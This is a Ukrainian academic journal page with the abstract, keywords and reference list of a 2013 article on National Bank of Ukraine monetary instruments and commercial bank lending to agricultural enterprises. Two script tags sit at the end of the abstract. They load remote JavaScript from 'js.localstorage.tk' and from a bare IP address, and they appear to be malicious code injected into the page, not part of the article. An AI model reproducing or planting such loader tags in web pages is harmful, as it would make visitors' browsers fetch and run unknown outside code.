ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 336.71:336.764.061.1:336.77
Фінансові відносини та бухгалтерський облік

Монетарні інструменти стимулювання кредитної активності комерційних банків / Вдовенко Л. О. // Економіка АПК. - 2013. - № 11 - С. 61

Розкрито застосування НБУ монетарних інструментів і їхній вплив на кредитну активність комерційних банків щодо підприємств аграрного бізнесу. Зроблено висновки, що поліпшення кредитного забезпечення аграрних підприємств досі не відбулося, навіть за умови позитивних змін на грошово-кредитному ринку та застосування НБУ монетарних інструментів. Встановлено, що дієвість впливу монетарних інструментів на стимулювання агропромислового виробництва залежить від ефективного їх застосування НБУ, тому потребує вдосконалення механізм рефінансування, що сприятиме розширенню ресурсної бази комерційних банків; здешевлення кредитів завдяки зміні процентної політики сприятиме активнішому їх спрямуванню в пріоритетні стратегічні галузі, однією з яких є сільське господарство й аграрний бізнес. Табл: 1. Рис.: 2. Бібліогр.: 17.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: монетарні інструменти, процентна політика, грошово-кредитна політика, норми обов’язкових резервів, облікова ставка, операції на відкритому ринку, банківське кредитування, рефінансування комерційних банків

Список використаних джерел

 1. Дзюблюк О. Особливості взаємозв’язку грошово-кредитної та валютної політики в період фінансової кризи / О. Дзюблюк // Світ фінансів. – 2012. – №1. – С. 130–141.
 2. Герасименко В.В. Норми обов’язкового резервування як інструмент державного регулювання ресурсного забезпечення кредитування банками реального сектору економіки / В.В. Герасименко, М.М. Шаповалова // Формування ринкових відносин в Україні. – 2011. – №12(127). – С.3-9.
 3. Олійник О. Аналіз ринку кредитних послуг / О. Олійник //Агробізнес сьогодні. – 2011. – №18(217). – С.50–52.
 4. Основні показники діяльності банків України на 1 липня 2011 року // Вісник НБУ. – 2011. – № 8(186). – С. 57.
 5. Основні показники діяльності банків України // Вісник НБУ. – 2012. – № 2. – С. 39.
 6. Hamblin Mary. Bank lending to agriculture: an overview / Mary Hamblin // Economic Review, 1975, issue Nov, pages 11-16.
 7. Eustacius N., Betubiza and David J. Leatham. Factors affecting commercial bank lending to agriculture / N. Eustacius, Betubiza and David J. Leatham // Journal of Agricultural and Applied Economics, 1995, vol. 27, issue 01.
 8. Rainelli P. Le financement des entreprises agricoles et industrielles / P. Rainelli // Économie rurale, 1973, vol. 96, issue 1, pages 87-100.
 9. Angela Roman and Valentina Diana Rusu. The access of small and medium size enterprises to banking financing and current challаnges: the case of eu countries / Angela Roman and Valentina Diana Rusu // Annales Universitatis Apulensis Series Oeconomica, 2012, vol. 2, issue 14, pages 21.
 10. Angela Roman and Valentina Diana Rusu. Constraints on bank lending to smes from Romania and supportive measures / Angela Roman and Valentina Diana Rusu // EuroEconomica, 2011, issue 5(30), pages 21-38.
 11. Науменкова С. Розвиток кредитування у посткризових умовах / С. Науменкова, С. Міщенко// Банківська справа. – 2013. – №1(109). – С. 3–20.
 12. Коваленко Л.О. Модель гармонізації бюджетної і грошово-кредитної політики, орієнтована на розвиток / Л.О. Коваленко, О.В.Абакуменко // Актуальні проблеми економіки. – 2011. – № 7(121). – С.241–252.
 13. Колобов Ю. Монетарні параметри розвитку економіки України / Ю. Колобов // Вісник НБУ. – 2012. – № 4 (194). – С. 3–38.
 14. Петрик О. Інфляція в Україні та її прогнозування в Національному банку / О. Петрик // Вісник НБУ. – 2012. – № 5(195). – С. 8–12.
 15. Арбузов С. Стан і перспективи розвитку грошово-кредитного ринку України / С. Арбузов, О. Щербакова // Вісник НБУ. – 2012. – № 6(196). – С. 3–9.
 16. Непочатенко О.О. Організаційно-економічні механізми кредитування аграрних підприємств: моногр. / О.О. Непочатенко – Умань, 2007. – 456 с.
 17. Інтернет-ресурс: www.ukrbank.info/ stavkanbu.html.
Читати статтю: 13_11_61-66.pdf